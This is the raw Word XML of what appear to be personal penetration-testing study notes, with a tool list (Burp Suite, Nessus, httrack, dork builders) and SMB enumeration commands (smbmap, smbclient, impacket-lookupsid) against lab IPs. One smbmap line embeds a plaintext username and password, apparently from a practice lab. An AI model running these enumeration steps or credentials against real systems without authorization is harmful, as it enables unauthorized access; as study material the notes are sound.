    </w:p>
    <w:p w14:paraId="31AC08BB" w14:textId="0113DE2F" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0"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k5 – cool site that contains components for hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B55B29" w14:textId="5975E358" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D"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ns.info – a site that get as input ip or domain and returns data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B699B" w14:textId="43B19448" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D"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orksearch.com </w:t>
      </w:r>
      <w:r w:rsidR="00BD11C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11C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 site that build the query of google dorks by the info you enter him about what you want to find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C2995" w14:textId="53FE5A6E" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0"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bbit Hole – Ai for hackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76921AF4" w14:textId="6223F295" w:rsidR="005C6F18" w:rsidRDefault="005C6F18"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track – tool that can extract all the pages behind a sit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httrack </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00F975F8">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johnbryce.co.il</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ake all the pages behind this site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D7B18" w14:textId="7DEE9B43" w:rsidR="00C23D7B" w:rsidRDefault="00C23D7B"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box – investigate as PT and get lil info as ip and subne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ybox - investigate as PT and get mediocre info as ip domains urls and mor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hitebox – investigate as PT and get a lot of info, even users sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B34819" w14:textId="2379E350" w:rsidR="0043739B" w:rsidRDefault="0043739B"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 – search info on internet in bare places (passive investiga</w:t>
      </w:r>
      <w:r w:rsidR="0018066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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684E642" w14:textId="751DC585" w:rsidR="00032DDE" w:rsidRDefault="00032DDE"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psuite – tool for web scanning, you can use also brute force on a site using that tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F1178" w14:textId="64426AE5" w:rsidR="00A25F69" w:rsidRDefault="00A25F69"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sus – strong tool that scan similar to nmap but has its advantages and disadvantages</w:t>
      </w:r>
      <w:r w:rsidR="003E0E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p w14:paraId="002D4975" w14:textId="39164394" w:rsidR="00685BB6" w:rsidRDefault="00685BB6" w:rsidP="00685BB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ba – meaning smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FBD374" w14:textId="7B1ECFCD" w:rsidR="00592E6C" w:rsidRDefault="00592E6C"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ing – when using recursion you need to put return sometimes in the right plac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therwise the function can continue again after it reached to the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E29C63" w14:textId="39198618" w:rsidR="00ED15CF" w:rsidRDefault="00ED15CF"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sh/powershell – if write it in terminal or cmd, you can open powershell shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522FADD" w14:textId="52369397" w:rsidR="009A1845" w:rsidRDefault="009A1845"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fference between portable file or installer file is the installer you are install on the computer what take more time and you cant pass it with disk on key, and sometimes you don’t have the permissions to install in on the computer, but it found on the computer which have faster abilities and more comfortable to use, on the contrary the portable file is a file that can run without install permissions, and you can pass it on disk on key</w:t>
      </w:r>
      <w:r w:rsidR="000B0A5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DA4091" w14:textId="23301916" w:rsidR="00897B79" w:rsidRPr="00897B79" w:rsidRDefault="00897B79"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ter inside share directory of windows we can write in linux in the place of path in the directory the path, like smb://10.10.10.10/c$/ then we will need to enter user and password and we can enter the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209A199" w14:textId="56554949" w:rsidR="00ED1CCC" w:rsidRDefault="00ED1CCC"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 – a language that web developers are using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F748" w14:textId="4C63059E" w:rsidR="00662F80" w:rsidRDefault="00662F80"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BNS,DNS,LLMNR – all of them protocol for name resolution </w:t>
      </w:r>
      <w:r w:rsidR="003618C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HCP – contains hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052626AB" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713"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F673F" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713"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6FCA5B" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713"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2147A" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713"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870BB1" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713"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F7715" w14:textId="77777777" w:rsidR="002F7AA6" w:rsidRDefault="002F7AA6" w:rsidP="00AD5A99">
      <w:pPr>
        <w:jc w:val="right"/>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3D3095" w14:textId="019D4054" w:rsidR="005E279D" w:rsidRPr="00296C76" w:rsidRDefault="0088672A"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D7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1CE8420" w14:textId="1701393B" w:rsidR="002F7AA6" w:rsidRPr="00294C81" w:rsidRDefault="002F7AA6" w:rsidP="002F7AA6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF000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mands From</w:t>
      </w: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B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7FEB0" w14:textId="5DE3CC0C" w:rsidR="00136837" w:rsidRDefault="00F663C6" w:rsidP="0013683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smbmap -H 10.10.10.10 -u admin – may let you see the names of the share directories, and permissions (smb port need to be opened)</w:t>
      </w:r>
      <w:r w:rsidR="000318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smbmap -H 10.10.10.10 -u Michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’</w:t>
      </w:r>
      <w:r w:rsidR="00551CA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0879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00551CA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hare directories and the permissions the user ha</w:t>
      </w:r>
      <w:r w:rsidR="000879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551CA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each directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F586D1" w14:textId="70CEFCFB" w:rsidR="00F663C6" w:rsidRDefault="00F663C6" w:rsidP="0013683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bclient //10.10.11.35/HR – mey let you see the co</w:t>
      </w:r>
      <w:r w:rsidR="009C55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of the shared directory</w:t>
      </w:r>
      <w:r w:rsidR="00765F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n it without password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E25D49" w14:textId="7904A4F0" w:rsidR="006E6E60" w:rsidRPr="00136837" w:rsidRDefault="006E6E60" w:rsidP="0013683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acket-lookupsid </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="005B6276">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10.10.10.10</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5DB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5DB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ld let you find usernames</w:t>
      </w:r>
      <w:r w:rsidR="000901F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ir SID</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E6E60" w:rsidRPr="00136837" w:rsidSect="00E17DB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4E41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8308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E4B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64741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64AE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7108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67626D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13060FE0"/>
    <w:lvl w:ilvl="0" w:tplc="985C7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91735B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE58DEBA"/>
    <w:lvl w:ilvl="0" w:tplc="9C18ED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99677258">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1971741777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="382022606">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="262499376">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1770812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DE"/>
    <w:rsid w:val="000042E7"/>
    <w:rsid w:val="00010244"/>
    <w:rsid w:val="000104DD"/>
    <w:rsid w:val="000120DF"/>
    <w:rsid w:val="000164C5"/>
    <w:rsid w:val="00021236"/>
    <w:rsid w:val="00021B18"/>
    <w:rsid w:val="00024C40"/>
    <w:rsid w:val="00026823"/>
    <w:rsid w:val="000318ED"/>
    <w:rsid w:val="00032DDE"/>
    <w:rsid w:val="00042906"/>
    <w:rsid w:val="00045548"/>
    <w:rsid w:val="0005505E"/>
    <w:rsid w:val="00056771"/>
    <w:rsid w:val="0005741C"/>
    <w:rsid w:val="00061C0E"/>
    <w:rsid w:val="00065E66"/>
    <w:rsid w:val="00074A8B"/>
    <w:rsid w:val="0008798C"/>
    <w:rsid w:val="000901F3"/>
    <w:rsid w:val="000906A3"/>
    <w:rsid w:val="00090CBC"/>
    <w:rsid w:val="00093FDF"/>
    <w:rsid w:val="0009466A"/>
    <w:rsid w:val="000A0D7F"/>
    <w:rsid w:val="000B0A5C"/>
    <w:rsid w:val="000C1525"/>
    <w:rsid w:val="000C387E"/>
    <w:rsid w:val="000D08CD"/>
    <w:rsid w:val="000D0B27"/>
    <w:rsid w:val="000D38A6"/>
    <w:rsid w:val="000D4F85"/>
    <w:rsid w:val="000D61EA"/>
    <w:rsid w:val="000E13AB"/>
    <w:rsid w:val="000E1FB5"/>
    <w:rsid w:val="000E6152"/>
    <w:rsid w:val="000F11FF"/>
    <w:rsid w:val="001038E7"/>
    <w:rsid w:val="00105047"/>
    <w:rsid w:val="00110024"/>
    <w:rsid w:val="00115F48"/>
    <w:rsid w:val="00130E25"/>
    <w:rsid w:val="00131B33"/>
    <w:rsid w:val="00132564"/>
    <w:rsid w:val="00134126"/>
    <w:rsid w:val="00136837"/>
    <w:rsid w:val="001418A0"/>
    <w:rsid w:val="00165101"/>
    <w:rsid w:val="00170589"/>
    <w:rsid w:val="0017417B"/>
    <w:rsid w:val="00180663"/>
    <w:rsid w:val="001A42D8"/>
    <w:rsid w:val="001A6FC4"/>
    <w:rsid w:val="001C0EBD"/>
    <w:rsid w:val="001C5241"/>
    <w:rsid w:val="001D0E2C"/>
    <w:rsid w:val="001E10F4"/>
    <w:rsid w:val="001E4F28"/>
    <w:rsid w:val="001E6FD2"/>
    <w:rsid w:val="001F05FB"/>
    <w:rsid w:val="001F44E7"/>
    <w:rsid w:val="002010E1"/>
    <w:rsid w:val="00201A21"/>
    <w:rsid w:val="002170DA"/>
    <w:rsid w:val="00220A8C"/>
    <w:rsid w:val="00220C1F"/>
    <w:rsid w:val="00227792"/>
    <w:rsid w:val="00233685"/>
    <w:rsid w:val="00255438"/>
    <w:rsid w:val="00260CB4"/>
    <w:rsid w:val="00265644"/>
    <w:rsid w:val="00294C81"/>
    <w:rsid w:val="00296C76"/>
    <w:rsid w:val="00297646"/>
    <w:rsid w:val="002A6727"/>
    <w:rsid w:val="002B6713"/>
    <w:rsid w:val="002C1548"/>
    <w:rsid w:val="002C5B72"/>
    <w:rsid w:val="002C7E3B"/>
    <w:rsid w:val="002D166C"/>
    <w:rsid w:val="002D17B5"/>
    <w:rsid w:val="002D2B47"/>
    <w:rsid w:val="002D35E9"/>
    <w:rsid w:val="002D7121"/>
    <w:rsid w:val="002F0752"/>
    <w:rsid w:val="002F4F3E"/>
    <w:rsid w:val="002F5701"/>
    <w:rsid w:val="002F60DB"/>
    <w:rsid w:val="002F7AA6"/>
    <w:rsid w:val="003000B5"/>
    <w:rsid w:val="00326F43"/>
    <w:rsid w:val="00327EAE"/>
    <w:rsid w:val="00337BF7"/>
    <w:rsid w:val="00340595"/>
    <w:rsid w:val="003467DE"/>
    <w:rsid w:val="00360534"/>
    <w:rsid w:val="003618C0"/>
    <w:rsid w:val="00361DDD"/>
    <w:rsid w:val="0036430B"/>
    <w:rsid w:val="003715FF"/>
    <w:rsid w:val="00371819"/>
    <w:rsid w:val="00372529"/>
    <w:rsid w:val="003728BE"/>
    <w:rsid w:val="003907BC"/>
    <w:rsid w:val="00390A2E"/>
    <w:rsid w:val="0039333C"/>
    <w:rsid w:val="003A088F"/>
    <w:rsid w:val="003A2A80"/>
    <w:rsid w:val="003A3976"/>
    <w:rsid w:val="003A5B81"/>
    <w:rsid w:val="003B1C01"/>
    <w:rsid w:val="003B35C9"/>
    <w:rsid w:val="003C1974"/>
    <w:rsid w:val="003C2A98"/>
    <w:rsid w:val="003D0295"/>
    <w:rsid w:val="003D0B21"/>
    <w:rsid w:val="003D0EAF"/>
    <w:rsid w:val="003D3CFF"/>
    <w:rsid w:val="003D50FC"/>
    <w:rsid w:val="003D5CCB"/>
    <w:rsid w:val="003D6D1D"/>
    <w:rsid w:val="003E0EA2"/>
    <w:rsid w:val="003E0F51"/>
    <w:rsid w:val="00406BD8"/>
    <w:rsid w:val="00407DB3"/>
    <w:rsid w:val="0041017E"/>
    <w:rsid w:val="00412636"/>
    <w:rsid w:val="00425D14"/>
    <w:rsid w:val="00425FB7"/>
    <w:rsid w:val="00426AC0"/>
    <w:rsid w:val="0043077E"/>
    <w:rsid w:val="0043317B"/>
    <w:rsid w:val="0043739B"/>
    <w:rsid w:val="0044046E"/>
    <w:rsid w:val="004456B5"/>
    <w:rsid w:val="00460961"/>
    <w:rsid w:val="00460AF6"/>
    <w:rsid w:val="00461CCA"/>
    <w:rsid w:val="00475987"/>
    <w:rsid w:val="004772A3"/>
    <w:rsid w:val="00480370"/>
    <w:rsid w:val="00495A6E"/>
    <w:rsid w:val="004B172E"/>
    <w:rsid w:val="004B7459"/>
    <w:rsid w:val="004C174E"/>
    <w:rsid w:val="004E119A"/>
    <w:rsid w:val="004E7214"/>
    <w:rsid w:val="005000CB"/>
    <w:rsid w:val="005017A7"/>
    <w:rsid w:val="00502E69"/>
    <w:rsid w:val="005033DB"/>
    <w:rsid w:val="0052648E"/>
    <w:rsid w:val="00531FCC"/>
    <w:rsid w:val="0053370D"/>
    <w:rsid w:val="00540DD2"/>
    <w:rsid w:val="00551CAF"/>
    <w:rsid w:val="005578F8"/>
    <w:rsid w:val="00563E0A"/>
    <w:rsid w:val="0056512E"/>
    <w:rsid w:val="005675ED"/>
    <w:rsid w:val="005832B0"/>
    <w:rsid w:val="00585246"/>
    <w:rsid w:val="005855F8"/>
    <w:rsid w:val="00586BFC"/>
    <w:rsid w:val="00592E6C"/>
    <w:rsid w:val="00596447"/>
    <w:rsid w:val="005A3156"/>
    <w:rsid w:val="005C2B40"/>
    <w:rsid w:val="005C5093"/>
    <w:rsid w:val="005C6F18"/>
    <w:rsid w:val="005E279D"/>
    <w:rsid w:val="005E6285"/>
    <w:rsid w:val="005E6FE5"/>
    <w:rsid w:val="00601862"/>
    <w:rsid w:val="00601DF1"/>
    <w:rsid w:val="00605A20"/>
    <w:rsid w:val="00613EAF"/>
    <w:rsid w:val="00614931"/>
    <w:rsid w:val="00620850"/>
    <w:rsid w:val="0062161E"/>
    <w:rsid w:val="00623466"/>
    <w:rsid w:val="0062373E"/>
    <w:rsid w:val="00634FC1"/>
    <w:rsid w:val="00647E23"/>
    <w:rsid w:val="0065544A"/>
    <w:rsid w:val="00655DAB"/>
    <w:rsid w:val="00660D7F"/>
    <w:rsid w:val="0066281F"/>
    <w:rsid w:val="00662F80"/>
    <w:rsid w:val="00670C38"/>
    <w:rsid w:val="00672E38"/>
    <w:rsid w:val="006749F7"/>
    <w:rsid w:val="00684BDD"/>
    <w:rsid w:val="00685BB6"/>
    <w:rsid w:val="0069419E"/>
    <w:rsid w:val="00697594"/>
    <w:rsid w:val="00697957"/>
    <w:rsid w:val="006A7925"/>
    <w:rsid w:val="006B420E"/>
    <w:rsid w:val="006C0698"/>
    <w:rsid w:val="006C60E7"/>
    <w:rsid w:val="006C63AB"/>
    <w:rsid w:val="006C7522"/>
    <w:rsid w:val="006D0E34"/>
    <w:rsid w:val="006D297C"/>
    <w:rsid w:val="006D49FC"/>
    <w:rsid w:val="006D75C9"/>
    <w:rsid w:val="006E5D31"/>
    <w:rsid w:val="006E6E60"/>
    <w:rsid w:val="006F0038"/>
    <w:rsid w:val="006F40E6"/>
    <w:rsid w:val="006F50F4"/>
    <w:rsid w:val="00702525"/>
    <w:rsid w:val="0072035A"/>
    <w:rsid w:val="00723AB1"/>
    <w:rsid w:val="007255CC"/>
    <w:rsid w:val="00726FC1"/>
    <w:rsid w:val="00730659"/>
    <w:rsid w:val="0074350B"/>
    <w:rsid w:val="00752E0F"/>
    <w:rsid w:val="00765F72"/>
    <w:rsid w:val="007676FF"/>
    <w:rsid w:val="0077103E"/>
    <w:rsid w:val="00772D97"/>
    <w:rsid w:val="00786159"/>
    <w:rsid w:val="007B0372"/>
    <w:rsid w:val="007B255B"/>
    <w:rsid w:val="007B4EEE"/>
    <w:rsid w:val="007C290D"/>
    <w:rsid w:val="007D60FA"/>
    <w:rsid w:val="007E7A84"/>
    <w:rsid w:val="007F4170"/>
    <w:rsid w:val="00800C80"/>
    <w:rsid w:val="0080350A"/>
    <w:rsid w:val="00804B18"/>
    <w:rsid w:val="00806014"/>
    <w:rsid w:val="00810F6C"/>
    <w:rsid w:val="008110CE"/>
    <w:rsid w:val="00813496"/>
    <w:rsid w:val="00813D0D"/>
    <w:rsid w:val="008154F1"/>
    <w:rsid w:val="00817295"/>
    <w:rsid w:val="00847C8A"/>
    <w:rsid w:val="00873EBB"/>
    <w:rsid w:val="00882BF3"/>
    <w:rsid w:val="00883A17"/>
    <w:rsid w:val="00885DB4"/>
    <w:rsid w:val="0088672A"/>
    <w:rsid w:val="00892789"/>
    <w:rsid w:val="0089352E"/>
    <w:rsid w:val="00897B79"/>
    <w:rsid w:val="008A0F76"/>
    <w:rsid w:val="008A3638"/>
    <w:rsid w:val="008A5775"/>
    <w:rsid w:val="008A6D1E"/>
    <w:rsid w:val="008A7727"/>
    <w:rsid w:val="008C066C"/>
    <w:rsid w:val="008C1582"/>
    <w:rsid w:val="008C3FDF"/>
    <w:rsid w:val="008D1514"/>
    <w:rsid w:val="008D2D4C"/>
    <w:rsid w:val="008D2F34"/>
    <w:rsid w:val="008D404F"/>
    <w:rsid w:val="008E373A"/>
    <w:rsid w:val="008E3BEF"/>
    <w:rsid w:val="008E6B86"/>
    <w:rsid w:val="008E7552"/>
    <w:rsid w:val="008F37CD"/>
    <w:rsid w:val="009163B0"/>
    <w:rsid w:val="00920AE9"/>
    <w:rsid w:val="009270C0"/>
    <w:rsid w:val="00930780"/>
    <w:rsid w:val="00930AF1"/>
    <w:rsid w:val="00933DDE"/>
    <w:rsid w:val="009364DF"/>
    <w:rsid w:val="00940D3C"/>
    <w:rsid w:val="0094127D"/>
    <w:rsid w:val="00943D30"/>
    <w:rsid w:val="00950D1D"/>
    <w:rsid w:val="00952985"/>
    <w:rsid w:val="0096541F"/>
    <w:rsid w:val="009775E5"/>
    <w:rsid w:val="00980E0E"/>
    <w:rsid w:val="00980E58"/>
    <w:rsid w:val="0098268D"/>
    <w:rsid w:val="00987E1B"/>
    <w:rsid w:val="009A1845"/>
    <w:rsid w:val="009A296D"/>
    <w:rsid w:val="009A2FE7"/>
    <w:rsid w:val="009B1FA0"/>
    <w:rsid w:val="009C5518"/>
    <w:rsid w:val="009C77E4"/>
    <w:rsid w:val="009D0E12"/>
    <w:rsid w:val="009D25B0"/>
    <w:rsid w:val="009D4D4B"/>
    <w:rsid w:val="009E0CBD"/>
    <w:rsid w:val="009E3A59"/>
    <w:rsid w:val="009E75D5"/>
    <w:rsid w:val="009F3651"/>
    <w:rsid w:val="00A01C63"/>
    <w:rsid w:val="00A16267"/>
    <w:rsid w:val="00A16B3E"/>
    <w:rsid w:val="00A25701"/>
    <w:rsid w:val="00A25F69"/>
    <w:rsid w:val="00A27EB3"/>
    <w:rsid w:val="00A30CDC"/>
    <w:rsid w:val="00A36FBE"/>
    <w:rsid w:val="00A37D8C"/>
    <w:rsid w:val="00A42FA5"/>
    <w:rsid w:val="00A47F17"/>
    <w:rsid w:val="00A503FD"/>
    <w:rsid w:val="00A625A1"/>
    <w:rsid w:val="00A664C2"/>
    <w:rsid w:val="00A716BA"/>
    <w:rsid w:val="00A71BB3"/>
    <w:rsid w:val="00A74E5E"/>
    <w:rsid w:val="00A80D19"/>
    <w:rsid w:val="00AA1546"/>
    <w:rsid w:val="00AA413F"/>
    <w:rsid w:val="00AB08CB"/>
    <w:rsid w:val="00AC0D7D"/>
    <w:rsid w:val="00AC2D8D"/>
    <w:rsid w:val="00AC4B75"/>
    <w:rsid w:val="00AD3C26"/>
    <w:rsid w:val="00AD5A99"/>
    <w:rsid w:val="00AD7813"/>
    <w:rsid w:val="00AE7481"/>
    <w:rsid w:val="00B01DEA"/>
    <w:rsid w:val="00B02F1C"/>
    <w:rsid w:val="00B0335A"/>
    <w:rsid w:val="00B102B3"/>
    <w:rsid w:val="00B106EC"/>
    <w:rsid w:val="00B1107D"/>
    <w:rsid w:val="00B150B7"/>
    <w:rsid w:val="00B215E0"/>
    <w:rsid w:val="00B268F8"/>
    <w:rsid w:val="00B30837"/>
    <w:rsid w:val="00B30D0C"/>
    <w:rsid w:val="00B30F5D"/>
    <w:rsid w:val="00B31BEF"/>
    <w:rsid w:val="00B369D0"/>
    <w:rsid w:val="00B4458F"/>
    <w:rsid w:val="00B53A54"/>
    <w:rsid w:val="00B634A3"/>
    <w:rsid w:val="00B64404"/>
    <w:rsid w:val="00B75E87"/>
    <w:rsid w:val="00B7689F"/>
    <w:rsid w:val="00B77A37"/>
    <w:rsid w:val="00B839D5"/>
    <w:rsid w:val="00B87F1F"/>
    <w:rsid w:val="00B95301"/>
    <w:rsid w:val="00B97BF5"/>
    <w:rsid w:val="00BB17D9"/>
    <w:rsid w:val="00BC0DD1"/>
    <w:rsid w:val="00BD11C3"/>
    <w:rsid w:val="00BD1A97"/>
    <w:rsid w:val="00BD4340"/>
    <w:rsid w:val="00BF7833"/>
    <w:rsid w:val="00C00D12"/>
    <w:rsid w:val="00C1032A"/>
    <w:rsid w:val="00C11F4F"/>
    <w:rsid w:val="00C15324"/>
    <w:rsid w:val="00C23D7B"/>
    <w:rsid w:val="00C30858"/>
    <w:rsid w:val="00C331AC"/>
    <w:rsid w:val="00C35EE5"/>
    <w:rsid w:val="00C37C9A"/>
    <w:rsid w:val="00C4394F"/>
    <w:rsid w:val="00C44632"/>
    <w:rsid w:val="00C4612C"/>
    <w:rsid w:val="00C567D6"/>
    <w:rsid w:val="00C62672"/>
    <w:rsid w:val="00C8563B"/>
    <w:rsid w:val="00C874E8"/>
    <w:rsid w:val="00C95C68"/>
    <w:rsid w:val="00C97ECA"/>
    <w:rsid w:val="00CA2A19"/>
    <w:rsid w:val="00CC2CFA"/>
    <w:rsid w:val="00CC4C4B"/>
    <w:rsid w:val="00CC6C94"/>
    <w:rsid w:val="00CC796D"/>
    <w:rsid w:val="00CD1987"/>
    <w:rsid w:val="00CD1EAB"/>
    <w:rsid w:val="00CD2538"/>
    <w:rsid w:val="00CD32C1"/>
    <w:rsid w:val="00CE32EB"/>
    <w:rsid w:val="00CE3331"/>
    <w:rsid w:val="00CF33F1"/>
    <w:rsid w:val="00CF3565"/>
    <w:rsid w:val="00CF6334"/>
    <w:rsid w:val="00CF6E4C"/>
    <w:rsid w:val="00D00FB0"/>
    <w:rsid w:val="00D14135"/>
    <w:rsid w:val="00D15AE0"/>
    <w:rsid w:val="00D232DD"/>
    <w:rsid w:val="00D27AC8"/>
    <w:rsid w:val="00D360F5"/>
    <w:rsid w:val="00D372E2"/>
    <w:rsid w:val="00D37B8F"/>
    <w:rsid w:val="00D521CF"/>
    <w:rsid w:val="00D5584C"/>
    <w:rsid w:val="00D80B1B"/>
    <w:rsid w:val="00D80EF2"/>
    <w:rsid w:val="00D841C6"/>
    <w:rsid w:val="00D8498F"/>
    <w:rsid w:val="00D85A07"/>
    <w:rsid w:val="00D87A16"/>
    <w:rsid w:val="00D924ED"/>
    <w:rsid w:val="00DB41C9"/>
    <w:rsid w:val="00DD7DC9"/>
    <w:rsid w:val="00DE0241"/>
    <w:rsid w:val="00DE253C"/>
    <w:rsid w:val="00E0359F"/>
    <w:rsid w:val="00E12743"/>
    <w:rsid w:val="00E17DBC"/>
    <w:rsid w:val="00E204D2"/>
    <w:rsid w:val="00E254BD"/>
    <w:rsid w:val="00E33098"/>
    <w:rsid w:val="00E34555"/>
    <w:rsid w:val="00E41A27"/>
    <w:rsid w:val="00E42462"/>
    <w:rsid w:val="00E45354"/>
    <w:rsid w:val="00E52D0A"/>
    <w:rsid w:val="00E7040D"/>
    <w:rsid w:val="00E706C9"/>
    <w:rsid w:val="00E80AD1"/>
    <w:rsid w:val="00E90810"/>
    <w:rsid w:val="00E957E7"/>
    <w:rsid w:val="00E96AF9"/>
    <w:rsid w:val="00EA275D"/>
    <w:rsid w:val="00EA6EB0"/>
    <w:rsid w:val="00EB2E07"/>
    <w:rsid w:val="00EC2FA6"/>
    <w:rsid w:val="00ED035E"/>
    <w:rsid w:val="00ED15CF"/>
    <w:rsid w:val="00ED1CCC"/>
    <w:rsid w:val="00EE1783"/>
    <w:rsid w:val="00EE2976"/>
    <w:rsid w:val="00EF3DD2"/>
    <w:rsid w:val="00EF488F"/>
    <w:rsid w:val="00EF4C60"/>
    <w:rsid w:val="00F06909"/>
    <w:rsid w:val="00F21800"/>
    <w:rsid w:val="00F32E78"/>
    <w:rsid w:val="00F344AA"/>
    <w:rsid w:val="00F35639"/>
    <w:rsid w:val="00F36876"/>
    <w:rsid w:val="00F50DB7"/>
    <w:rsid w:val="00F613E9"/>
    <w:rsid w:val="00F663C6"/>
    <w:rsid w:val="00F806EA"/>
    <w:rsid w:val="00F833E7"/>
    <w:rsid w:val="00F83721"/>
    <w:rsid w:val="00F948A1"/>
    <w:rsid w:val="00F954CE"/>
    <w:rsid w:val="00FA06B9"/>
    <w:rsid w:val="00FA63E9"/>
    <w:rsid w:val="00FA6911"/>
    <w:rsid w:val="00FC1610"/>
    <w:rsid w:val="00FC205C"/>
    <w:rsid w:val="00FD3637"/>
    <w:rsid w:val="00FD41BF"/>
    <w:rsid w:val="00FE275B"/>
    <w:rsid w:val="00FF3DB4"/>
    <w:rsid w:val="00FF42A0"/>
    <w:rsid w:val="00FF6A8D"/>
    <w:rsid w:val="00FF72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20C8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD0F4000-9F40-429C-9BC2-BB7BE132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AA6"/>
    <w:pPr>
      <w:bidi/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003467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67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67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67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7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7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7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7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7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7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67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67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67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7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7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7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7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7DE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00346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7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7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7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7DE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003467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7DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
